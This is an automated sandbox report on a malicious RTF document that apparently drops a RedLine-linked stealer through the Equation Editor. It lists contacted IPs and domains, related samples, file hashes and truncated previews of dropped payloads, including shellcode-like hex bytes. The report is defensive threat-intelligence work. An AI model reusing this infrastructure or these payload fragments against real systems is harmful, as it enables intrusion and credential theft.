                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.000000000250B000.00000004.00000800.00020000.00000000.sdmp, tmpF616.tmp.6.dr, tmpC03.tmp.6.dr, tmpF627.tmp.6.dr, tmp309C.tmp.6.dr, tmpF615.tmp.6.dr, tmp30AD.tmp.6.dr, tmpF65A.tmp.6.dr, tmpF649.tmp.6.dr, tmpC14.tmp.6.dr, tmpF637.tmp.6.dr, tmpF648.tmp.6.dr, tmp1AAE.tmp.6.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000002.00000003.355300248.0000000000620000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.355464956.0000000000627000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387687686.0000000000760000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://api.ipify.orgcooRegSvcs.exetrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.xmlsoap.org/soap/actor/nextRegSvcs.exe, 00000006.00000002.387767388.00000000023B1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegSvcs.exe, 00000006.00000002.387767388.0000000002858000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.387767388.000000000250B000.00000004.00000800.00020000.00000000.sdmp, tmpF616.tmp.6.dr, tmpC03.tmp.6.dr, tmpF627.tmp.6.dr, tmp309C.tmp.6.dr, tmpF615.tmp.6.dr, tmp30AD.tmp.6.dr, tmpF65A.tmp.6.dr, tmpF649.tmp.6.dr, tmpC14.tmp.6.dr, tmpF637.tmp.6.dr, tmpF648.tmp.6.dr, tmp1AAE.tmp.6.drfalse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        172.67.162.95
                        		universalmovies.topUnited States
                        		13335CLOUDFLARENETUStrue
                        185.38.142.10
                        		unknownPortugal
                        		47674NETSOLUTIONSNLtrue

                        General Information

                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1461862
                        Start date and time:2024-06-24 18:26:15 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 6m 45s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                        Number of analysed new started processes analysed:12
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:2MbHBiqXH2.rtf
                        renamed because original name is a hash value
                        Original Sample Name:2d1b096a33d1b673fd06db9f3e861761.rtf
                        Detection:MAL
                        Classification:mal100.troj.spyw.expl.evad.winRTF@7/45@3/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 68
                        • Number of non-executed functions: 270
                        Cookbook Comments:
                        • Found application associated with file extension: .rtf
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Attach to Office via COM
                        • Active ActiveX Object
                        • Scroll down
                        • Close Viewer

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 172.67.75.172, 104.26.13.31, 104.26.12.31
                        • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtSetInformationFile calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: 2MbHBiqXH2.rtf

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        12:27:05API Interceptor278x Sleep call for process: EQNEDT32.EXE modified
                        12:27:09API Interceptor51x Sleep call for process: RegSvcs.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        172.67.162.95Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.docGet hashmaliciousRedLineBrowse
                          Kobe 045EX07227 CLG6739.docx.docGet hashmaliciousUnknownBrowse
                            Kobe 045EX07227 CLG6739.docx.docGet hashmaliciousUnknownBrowse
                              PROFORMAXINVOICE.docx.docGet hashmaliciousLokibotBrowse
                                MV HTK Lavender.docGet hashmaliciousLokibotBrowse
                                  PUO.docx.docGet hashmaliciousHTMLPhisherBrowse
                                    336HB7m70J.rtfGet hashmaliciousAgentTeslaBrowse
                                      LIW_009.docx.docGet hashmaliciousFormBookBrowse
                                        PAYMENT SLIP.docGet hashmaliciousAgentTeslaBrowse
                                          PAYROLL.docGet hashmaliciousFormBookBrowse
                                            185.38.142.10YPSvIjQCzd.exeGet hashmaliciousRedLineBrowse
                                            • 185.38.142.10:7474/
                                            Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.docGet hashmaliciousRedLineBrowse
                                            • 185.38.142.10:7474/
                                            MSH INV 2024-0117 Secure Payment Invoice for .exeGet hashmaliciousRedLineBrowse
                                            • 185.38.142.10:7474/

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            universalmovies.topInvoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.docGet hashmaliciousRedLineBrowse
                                            • 104.21.74.191
                                            MT103-746394.docGet hashmaliciousFormBookBrowse
                                            • 104.21.74.191
                                            Kobe 045EX07227 CLG6739.docx.docGet hashmaliciousUnknownBrowse
                                            • 172.67.162.95
                                            Kobe 045EX07227 CLG6739.docx.docGet hashmaliciousUnknownBrowse
                                            • 172.67.162.95
                                            PROFORMAXINVOICE.docx.docGet hashmaliciousLokibotBrowse
                                            • 172.67.162.95
                                            MV HTK Lavender.docGet hashmaliciousLokibotBrowse
                                            • 172.67.162.95
                                            PUO 2.docGet hashmaliciousHTMLPhisherBrowse
                                            • 104.21.74.191
                                            PUO.docx.docGet hashmaliciousHTMLPhisherBrowse
                                            • 172.67.162.95
                                            336HB7m70J.rtfGet hashmaliciousAgentTeslaBrowse
                                            • 172.67.162.95
                                            lrShdpqqbi.rtfGet hashmaliciousFormBookBrowse
                                            • 104.21.74.191

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            NETSOLUTIONSNLYPSvIjQCzd.exeGet hashmaliciousRedLineBrowse
                                            • 185.38.142.10
                                            Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.docGet hashmaliciousRedLineBrowse
                                            • 185.38.142.10
                                            MSH INV 2024-0117 Secure Payment Invoice for .exeGet hashmaliciousRedLineBrowse
                                            • 185.38.142.10
                                            sclfmLKwR7.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 185.38.142.103
                                            3nYvEPuDi1.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 185.38.142.103
                                            DS4T3FyXbu.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 185.38.142.103
                                            pDHAW6Eo6E.elfGet hashmaliciousGafgytBrowse
                                            • 185.38.142.103
                                            q5TDXPUPJg.elfGet hashmaliciousGafgytBrowse
                                            • 185.38.142.22
                                            K8pQUoHdUc.elfGet hashmaliciousGafgytBrowse
                                            • 185.38.142.22
                                            PWkv0lkpNM.elfGet hashmaliciousGafgytBrowse
                                            • 185.38.142.22
                                            CLOUDFLARENETUSInvoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.docGet hashmaliciousRedLineBrowse
                                            • 104.21.74.191
                                            MT103-746394.docGet hashmaliciousFormBookBrowse
                                            • 172.67.180.94
                                            QUOTATION PT INDONESIA.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.26.13.205
                                            DHL_Shipment_Details.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 172.67.74.152
                                            PO-2405280.xlsGet hashmaliciousRemcosBrowse
                                            • 104.21.26.96
                                            Po-6528279-SK.xlsGet hashmaliciousAgentTeslaBrowse
                                            • 188.114.97.3
                                            Potwierdzenie zam#U00f3wienia.doc.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                            • 172.67.74.152
                                            doc2406.vbsGet hashmaliciousFormBookBrowse
                                            • 172.67.75.40
                                            PO53467.xlsGet hashmaliciousRemcosBrowse
                                            • 104.21.26.96
                                            https://erpportal.com/1331/LV/forms/new/100110215%7C1AC492413EB45535E0632D16670A3281Get hashmaliciousUnknownBrowse
                                            • 162.247.243.29

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            7dcce5b76c8b17472d024758970a406bInvoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.docGet hashmaliciousRedLineBrowse
                                            • 172.67.162.95
                                            MT103-746394.docGet hashmaliciousFormBookBrowse
                                            • 172.67.162.95
                                            PO-2405280.xlsGet hashmaliciousRemcosBrowse
                                            • 172.67.162.95
                                            Po-6528279-SK.xlsGet hashmaliciousAgentTeslaBrowse
                                            • 172.67.162.95
                                            PO53467.xlsGet hashmaliciousRemcosBrowse
                                            • 172.67.162.95
                                            PO-240528.xlsGet hashmaliciousRemcosBrowse
                                            • 172.67.162.95
                                            Bills Paid.xlsGet hashmaliciousRemcosBrowse
                                            • 172.67.162.95
                                            5698.docx.docGet hashmaliciousUnknownBrowse
                                            • 172.67.162.95
                                            IlWPStOFHj.rtfGet hashmaliciousRemcosBrowse
                                            • 172.67.162.95
                                            V8ZnJcPOUY.rtfGet hashmaliciousHTMLPhisherBrowse
                                            • 172.67.162.95

                                            Dropped Files

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Users\user\AppData\Roaming\notorious53209.exeInvoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.docGet hashmaliciousRedLineBrowse
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ExtExport2[1].exeInvoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.docGet hashmaliciousRedLineBrowse

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ExtExport2[1].exe

                                                Download File
                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                Category:dropped
                                                Size (bytes):644096
                                                Entropy (8bit):7.796206243772775
                                                Encrypted:false
                                                SSDEEP:12288:SYV6MorX7qzuC3QHO9FQVHPF51jgcN6S5UesUInNnpo2R2:hBXu9HGaVHN6S5U5Rn/Y
                                                MD5:901A623DBCCAA22525373CD36195EE14
                                                SHA1:9ADB6DDDB68CD7E116DA9392E7EE63A8FA394495
                                                SHA-256:B5E250A95073B5DFE33F66C13CC89DA0FC8D3AF226E5EFB06BB8FCFD9A4CD6EC
                                                SHA-512:EABEBA0EB9AE7E39577A7E313E50807CEE1B888F1C8FF0FA375E5DE9451A66471C791C23EA4F4AF85151F96B065D55E8C1320026D8503A048A3E5968F8EFFC1D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 50%
                                                Joe Sandbox View:
                                                • Filename: Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.doc, Detection: malicious, Browse
                                                Reputation:low
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L...."yf.........."......p...p....................@..........................p............@...@.......@.....................Dg..$.......Dg..................hk......................................t...H...........................................UPX0....................................UPX1.....p.......d..................@....rsrc....p.......l...h..............@..............................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{19974688-676C-42C5-B3FA-1B7C9934651A}.tmp

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):16384
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3::
                                                MD5:CE338FE6899778AACFC28414F2D9498B
                                                SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C1F171FF-5935-4ECE-AEAB-F155E5039A46}.tmp

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):349696
                                                Entropy (8bit):3.417490336338016
                                                Encrypted:false
                                                SSDEEP:6144:Syemryemryemryemryemryemryemryemryemryemryemryemryemryemryemryec:k
                                                MD5:0EF01B48120959FD3A3D3F0B20BA5521
                                                SHA1:A77909012684BE2EF37CB67DBC2A2B384FC9FE45
                                                SHA-256:A431BF0591F5CED3369A2E54C29E90A19D23B7DD751A0F920DA4909AE46FFD04
                                                SHA-512:B95598EFB471F0B67268001B809DA7AF66C976E82D9FF7C69F29DE3150C4692814DDC0F79BDAABE1B66D1F1037BB96CAFB944F139E1745BF2E6BDF2CE8018EC3
                                                Malicious:false
                                                Reputation:low
                                                Preview:4.4.3.4.5.9.5.8.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EF2D272F-8010-4272-8E46-58178AC2768F}.tmp

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1024
                                                Entropy (8bit):0.05390218305374581
                                                Encrypted:false
                                                SSDEEP:3:ol3lYdn:4Wn
                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F9391617-51B5-4C44-95A1-F2C8753C339A}.tmp

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1536
                                                Entropy (8bit):1.3531234148749365
                                                Encrypted:false
                                                SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbW:IiiiiiiiiifdLloZQc8++lsJe1Mzbl
                                                MD5:D68FBF5E0D370ED5FAC38172BAD02319
                                                SHA1:003B10AFACFD0D286FAABC9522B37AC59F9C6CBC
                                                SHA-256:8BF9E4664B787BD10E99A1F392E818EB147CF45FB1E2DDAED1F28FE793FCEEDF
                                                SHA-512:20770D77E283E7E5FBDE293F3CC504902314AA6343CA816FF8141C955C54F0073426A146319D191CDCE371D9305AFD8FD05888C258E1B089395D8E119A2DC5DC
                                                Malicious:false
                                                Reputation:low
                                                Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\Keily

                                                Download File
                                                Process:C:\Users\user\AppData\Roaming\notorious53209.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):97792
                                                Entropy (8bit):7.014747102810205
                                                Encrypted:false
                                                SSDEEP:1536:3f3IwWiew9JOnlc9exhXLpLiw5kvYBnuRJd4d89cpmnn/amKyQH4b:v4wWcJOl0yfLi6RBnGQdCcSTKyw4b
                                                MD5:F19534A061ECC70BB81126F953505D72
                                                SHA1:C1613560EA60D1A0407BA6B06EEA10C874512A48
                                                SHA-256:97D29F1E5E3BB5C8C1EB956C0135A820825973869C1B098705490010E0216FA8
                                                SHA-512:C9828341199C910F8661A1A6FBFC28C7A00D88C9378247DD57A154906E191AF63E1AB793253A14DE1FE764C28703A48F75CCF16E9840941A2B4A221E23C6F8C6
                                                Malicious:false
                                                Preview:.i.HYIY1QKJ6..UV.37LPNA1.3BHZIY1UKJ6DTUVS37LPNA1S3BHZIY1UKJ6.TUV],.BP.H.r.C..h.Y<8jF6;2$2^./1 /^'. -z;,_u"$....v>\S)~CL;w3BHZIY1..J6.UVV.;.PNA1S3BH.I[0^Jz6D TVS;7LPNA1m.CHZiY1UKJ6DT.VS.7LPLA1W3BHZIY1QKJ6DTUVS.6LPLA1S3BHYI..UKZ6DDUVS3'LP^A1S3BHJIY1UKJ6DTUV..6L.NA1S.CH.MY1UKJ6DTUVS37LPNA1S.CHVIY1UKJ6DTUVS37LPNA1S3BHZIY1UKJ6DTUVS37LPNA1S3BHZIY1UkJ6LTUVS37LPNA1[.BH.IY1UKJ6DTUV}GR4$NA1.@CHZiY1U?K6DVUVS37LPNA1S3BHzIYQ{99D'TUV.77LP.@1S5BHZ?X1UKJ6DTUVS37L.NAq}A'$5*Y1YKJ6D.TVS17LP2@1S3BHZIY1UKJ6.TU.S37LPNA1S3BHZIY1u.K6DTUV.37LRND1.BHj.Y1VKJ6.TUPS37LPNA1S3BHZIY1UKJ6DTUVS37LPNA1S3BHZIY1UKJ6DTUVH.>LpMA1R3BY)HY1_AHHGTURv. j.LA1W.DXZI_BWKJ<a.VVS7.MPNj^W3BBQq.3UKMYATU\D$..XNA0v%]B.@Y1Tn.<ETQ~U37F#IA1Y.g_D.P1UJo.FUUR{57LZ=F1S9.mBT.8UKK..STVW.1LPD26S3H.rHX1S$B6D^Yn.17LBLi8S3HE)@Y1SXNEhUUP@6&H.DA1YNCHZM';UK@%BEQ_ 87LZfM1S9-EZISLTKJ2UP.WS33S_.H1S2g.HHY5}MJ6N'RVS9XBPNK.I-.AZIX...J6@|SVS9DKPNK"U..AEw.8UKK...UVW.1LPD26S3H:[IYA+AJ6N|ZVS9.\PNK^]3BBwGH5.JJ6@|QWS5.@AJ:0S3F`YHY7FM[0lEUVY.aMPNP7E\PHZCJ9GCb%DT_9

                                                C:\Users\user\AppData\Local\Temp\autA555.tmp

                                                Download File
                                                Process:C:\Users\user\AppData\Roaming\notorious53209.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):77430
                                                Entropy (8bit):7.847295981704258
                                                Encrypted:false
                                                SSDEEP:1536:h7JUSmTdZHmVysGL4cdNtKFk8MfCCaeQ6++dzexRW0vqN:h7QZGVysGLDvQffC9Xyxs0vM
                                                MD5:30AB7658AD775CB44E4B08C7EBC12A2C
                                                SHA1:5D14B0BFB0AE504148EDC517F41DC0A5992ED935
                                                SHA-256:8FAD249F983DBF5CAAEF3D72A53210F4A1B2BE6D81B2EB3A59CF7151BF5666C1
                                                SHA-512:DCB6707E2290CBC21F4C3015E249001AB87A5A26945F4AE9E57D067C8FC135FA1847929F58B1039F9D0A2EB5FC50129B9DD47AF43EA9E4CFC2102EE762A91A70
                                                Malicious:false
                                                Preview:EA06..~..ZzT..&.1...Sm..V.....:.1...T....U..(.J.Z..1....x...vY..T?T....C.e.....qj.M.s)$....d....' ..r...E$.@#pk...S..t....#0Xu*m.......x....&.0.R.Sj$..V....1m.P...H....j.L.`.Pf5p...@*5...@..f...Uiu............)@....f..8....0......C.U.B? ....J.S..;[... ...h.)...`...63?...`....I..os...N.`cf.....1..@...`....S.7...O$..3.....8& ....Q.A*.X..G.u.R..(...R.Q&>|...j.Vf5`...T...<?.... s.e.A..t*..Y...4.E..U.]...T.....+..M~.W.....Z.S....u....P.7...K..h5J.r.$.pk.....%......n.O(.J...3..t.......J..J....Z.J.5..+S.4.9.[hUN..K...:.Z....*.I..3.z.T...$.M....*.@P......E..0.:.:.h..j........0.....'..it.-..Q..'.......Kh..MN.T..UZ...S...u.."cS.Y...Efk}....=J.S..(U.u.;I...5.Mb)..R....L.`.R....V1...n....U@*=:..k4.].. .V....p...W@H....5.R....^.5.P(4...3.X+4...M..-.Z.Z..........P.V.t....b..*.......*.i.H.Xi.....0....O....J.>.X...5...D.S-..p....H.....W%1.L.S..l.:u.5@...|.#T..$..-Jsq.M.T.]Bk...)..|.V.pR(.?..d....U........@.e2.5..h3j%JMJ.`&UZu.kv.Um.JX....I(.J.....]y.I.Noj..

                                                C:\Users\user\AppData\Local\Temp\autA575.tmp

                                                Download File
                                                Process:C:\Users\user\AppData\Roaming\notorious53209.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):9840
                                                Entropy (8bit):7.599061336130256
                                                Encrypted:false
                                                SSDEEP:192:6ZxWQa8nm1Wh8fpWAsdzNasmdge/rEoTyRLB7bNZUDLrMZkn:6Zx3a8nmYhzd0smr/rEvRLtZeDXMZo
                                                MD5:DD1E8868F31121B176C168A4A1B48E63
                                                SHA1:1A57A6B5DA768E963166B07A13A38EEC98F0878F
                                                SHA-256:D36E5C68763ED63F3068F5330F4D80488A0294C05663C30ADE57E017EA50F842
                                                SHA-512:F95B66FBDD3DD81861189ACC96A2C3121493C8109D37C29C68C99B572A37C551AAA44A8632985F4C8335E02D9B33F2C9501791FA3084310031E6E5417B1A6096
                                                Malicious:false
                                                Preview:EA06..pT..h.I..D.P..)..q1..htZ..g6.M.SY..mD.Mf.y..e2..&3y..9.M.....9..4i...4...9..8.P.T:4.1.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,S....f.I...a..-vk5.........6.l,`........fs;....`....g.I......l..]..f.`...9|....p.1..... ..$h.c.....#@...H,....`..k0.H.f. ...<zk5....!9.B...3p.n.f.I..q7.t.,. ....4....`....8.........c....P....0.... ..Y@....../Z..-zs5...jq7...zl........V....#.p..N&...M.^.9.....7.:..w.......7...}3p#..oc...f.P./....J.v.5..@{...........a..f.....`.Y..`...&.......x...u| .....Y,@=.%.d....&.)...,S`./..8....@..%....Y@..;...#.Y,s ./.k5...4.;...K.4|.;..g.c....c..&.i....x.&.k...c.Y'3Y...@}.4..3.....33...se.M'.@C`..s....e.,..h........Y.......Y.$.p.Y...f.e...8.....2...@.;1.X.`..L' ..........@.37.Ll.K.......9d..,vd.....i2........#. ....3a..g.`j.....Bvf.....@R.r"p.h.s.....,vf......t.L@...40.....f....N&3....4..@.6.-..p..S.-..2...S0.N.@.;5.`..9.M,`...k8.....c.P..Yf3.wx.....vl......@.E....N.y6....p.c3.%..4..b

                                                C:\Users\user\AppData\Local\Temp\lophophorine

                                                Download File
                                                Process:C:\Users\user\AppData\Roaming\notorious53209.exe
                                                File Type:ASCII text, with very long lines (28756), with no line terminators
                                                Category:dropped
                                                Size (bytes):28756
                                                Entropy (8bit):3.5909811262375784
                                                Encrypted:false
                                                SSDEEP:768:AiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbA+IL26cz24vfF3if6gn:AiTZ+2QoioGRk6ZklputwjpjBkCiw2RC
                                                MD5:C2214B487E6119B5226D591926532EE9
                                                SHA1:D9A27C71655D441A47A92AA63AAD433F25625FB5
                                                SHA-256:33CE9852B482618CCE0E5C282FD710E02400CB310CEE839537DB9C2585167ADB
                                                SHA-512:0AB7541E705BC233A5F834C271C4888CC0F3DA45A7E10E659391CEFEF3082F7D993D94E79629111B35B4D8AFC3BACB83EA0BF57BA737C1B6D956825EF2A7C939
                                                Malicious:false
                                                Preview:A9E499CD8C02898115CEA73647257D6D456782227821727D946E9B8E916AF2AC47BE395D80BBCF6E100x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffff

                                                C:\Users\user\AppData\Local\Temp\tmp1AAE.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                Category:dropped
                                                Size (bytes):77824
                                                Entropy (8bit):1.133993246026424
                                                Encrypted:false
                                                SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                Malicious:false
                                                Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\tmp1ACF.tmp

                                                Download File
